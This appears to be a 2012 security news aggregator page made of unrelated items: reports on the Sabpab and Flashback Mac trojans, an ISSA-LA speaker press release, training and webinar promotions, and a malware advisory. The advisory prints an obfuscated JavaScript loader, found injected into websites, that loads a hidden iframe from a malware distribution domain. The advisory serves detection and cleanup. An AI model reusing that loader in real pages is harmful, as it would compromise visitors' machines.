New Mac Trojan: Sabpab
A new Trojan known as “Sabpab” could hurt Mac users who run Java and Microsoft Word. Security researchers are warning users to make sure their computers have the latest software updates from both Apple and Microsoft, and to use anti-virus software. In some cases, manual removal of Sabpab may be needed.
Word about Sabpab comes on the heels of another nasty piece of malware, Flashback, that infected up to as many as 600,000 Macs, security experts said, by exploiting a vulnerability in Java software. Apple last week issued a software-base removal tool for that malware, which can be used by criminals to steal personal information, including passwords.
Read More Here
Sabpab, Another Mac OS X backdoor Trojan horse as been discovered
Interesting article by Graham Clueley at NakedSecurity.com
More malware for the Mac OS X platform has been discovered, hot on the heels of the revelation that some 600,000 Macs had been infected in the Flashback attack.
And just like Flashback, the new Trojan doesn’t require any user interaction to infect your Apple Mac.
The Sabpab Trojan horse exploits the same drive-by Java vulnerability used to create the Flashback botnet.
Read More Here
Executive Coach Chris Coffey is Featured Speaker at ISSA-LA 4th Annual Information Security Summit
PRLog (Press Release) – Apr 12, 2012 –
World renowned executive and leadership coach Chris Coffey will be a featured speaker at the Los Angeles Chapter of the Information Systems Security Association’
“We are excited to have Chris as a featured speaker at our summit,” said ISSA-LA President Stan Stahl, PhD. “Chris’
Mr. Coffey is one of the pioneers and a significant contributor to the fields of leadership, feedback-based training and executive coaching. In 1981, while working and learning at the Center for Leadership Studies, Chris met Paul Hersey, Marshall Goldsmith, and Frank Wagner. It changed his life. Although he had been pursuing an acting career with some success, having appeared in his first feature film “A Change of Seasons” with Bo Derek, Chris had found his true calling. By 1984 he was totally out of the acting business and fully engaged in consulting as a member of the prestigious Keilty, Goldsmith & Boone (KGB) firm in LaJolla, California.
KGB is a pioneer in developing programs to teach Excellence in Management. Mr. Coffey’s stage and movie experience proved extremely useful in teaching and presenting. Chris began by leading Excellent Manager Workshops for middle managers and above at IBM, Warner Lambert, Citibank, Apple and other Fortune 500 companies. Incorporating his experience in acting and directing, Chris brings his own distinctive common-sense approach to designing and conducting workshops in leadership, management, team-building, and influencing without authority.
Mr. Coffey graduated from Fairfield University in Connecticut with a BS in marketing and is a U.S. Navy veteran.
About the LA Chapter of the Information Systems Security Association (ISSA-LA)
The Los Angeles Chapter is the founding Chapter of the Information Systems Security Association, an international not-for-profit organization of information security professionals and practitioners. ISSA-LA is the premier catalyst and information source in Los Angeles for improving the practice of information security. The Chapter conducts outreach programs to business, nonprofits, government and consumers. For more information or to register for ISSA-LA’s 4th Annual Information Security Summit, please visit: www.issa-la.org .
# # #
Networking-Crisis Management-Media Placement-Special Events-Image Building:
Public relations services to such clients as law, healthcare, entertainment, products, real estate, banking, education, hospitality, nonprofits.
JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW
Description:
A malicious and encoded javascript file was found inside the site content and is being used to distribute malware (from newportalse.com and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product).
Domains used in this attack:
newportalse.com
(and many others)
Affecting:
Any web site (no specific target).
Clean up:
This malware is generally hidden at the bottom of the .html or javascript files.
Malware dump (sample of malware):
var _0x4de4=[“x64x20x35x28x29x7Bx62x20x30x3Dx32x2Ex63x28x22x33x22x29x3B
x32x2Ex39x2Ex36x28x30x29x3Bx30x2Ex37x3Dx27x33x27x3Bx30x2Ex31x2Ex61x3Dx27x34x27x3Bx30x2Ex31x2Ex6Bx3Dx27x34x27x3Bx30x2Ex69x3Dx27x66x3Ax2Fx2Fx67x2Dx68x2Ex6Dx2F
x6Ax2Ex65x27x7Dx38x28x35x2Cx6Cx29x3B”,”x7C”,”x73x70x6Cx69
x74″,”x65x6Cx7Cx73x74x79x6Cx65x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx69x66x72x61x6Dx65x7Cx31x70x78x7Cx4Dx61x6Bx65x46x72x61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69
x6Cx64x7Cx69x64x7Cx73x65x74x54x69x6Dx65x6Fx75x74x7Cx62x6Fx64x79x7Cx77x69x64x74
x68x7Cx76x61x72x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx66x75x6Ex63x74x69x6Fx6Ex7Cx70x68x70x7Cx68x74x74x70x7Cx63x6Fx75x6Ex74x65x72x7Cx77x6Fx72x64x70x72
x65x73x73x7Cx73x72x63x7Cx66x72x61x6Dx65x7Cx68x65x69x67x68x74x7Cx31x30x30x30x7C
x63x6Fx6D”,”x72x65x70x6Cx61x63x65″,””,”x5Cx77x2B”,”x5Cx62″,”x67″];eval(function
(_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3–)
{_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3–){if(_0x2f46x4[_0x2f46x3])
{_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return&
nbsp;_0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));
SANSFIRE 2012 is coming to Washington, DC
SANSFIRE 2012 will take place at our Hilton Washington and Towers campus, July 6-15. There will be more than 40 SANS IT Security Training courses available. This training event is powered by the (ISC) Internet Storm Center and is an opportunity to meet the ISC handlers.
Each evening, the ISC handlers share compelling talks on their most interesting experiences and newest cyber hazards. These special presentations are free to everyone who attends a course at SANSFIRE 2012. For more than 10 years, the Internet Storm Center has been providing free analysis and warning to our community. It is your chance to meet some of our handlers face to face, to listen to what they have to report, and to ask questions about topics that interest you.
New cutting-edge courses coming to SANSFIRE 2012:
· Security 575: Mobile Device Security and Ethical Hacking
· Security 579: Virtualization and Private Cloud Security
· Forensics 508: Advanced Computer Forensic Analysis and Incident Response
Many of our courses offered at SANSFIRE 2012 are associated with a GIAC Certification. Put the skills you’ll learn to practical use and join over 41,500 GIAC certified professionals who make the IT Security industry safe!
NetWars Tournament Play: Two Night Interactive Security Challenge:
Thursday, July 12 & Friday, July 13 * 6:30pm – 9:30pm
**All students who register for a 5- or 6- day course will be eligible to play NetWars for FREE. Register Now!
For complete details regarding SANSFIRE 2012 please visit:
http://www.sans.org/info/103104
*** Free corresponding GIAC Certification Exam attempt (a $549 value) when you register and pay for a qualifying SANSFIRE 2012 course with referral code: SecOrb_SFGIAC ***
SC eSymposium: Cyber espionage
SC eSymposium: Cyber espionage
Date: Tuesday, April 24
Location: Your computer
Earn CPE credits for attending*
Click on the link below to register for FREE:
http://sc.haymarketcomm.net/r/
Those engaging in cyber espionage to steal classified and/or proprietary data from U.S. agencies and other organizations are riding high. Foreign spies, including U.S. allies, are increasingly launching digital assaults against the nation to steal sensitive economic secrets, according to a recent report by the U.S. Office of National Counterintelligence Executive. The theft of this critical information shows that attackers – state-sponsored or not – are enlisting whatever weaknesses in systems they can to steal corporate and government data, often going unnoticed for months. Experts share background on the types of attacks to watch out for and what to do to thwart them.
Platinum sponsors:
EdgeWave
HP Enterprise Security
SC World Congress 24/7 exhibitors:
Damballa
LogRhythm
Secunia
Solutionary
Sophos
Click on the link below to register for FREE:
http://sc.haymarketcomm.net/r/
For more information, please e-mail mailto:maggie.keller@
*SC Magazine is a designated (ISC)2 CPE provider. CPE credits will be issued to only live attendees with (ISC)2 credentials.
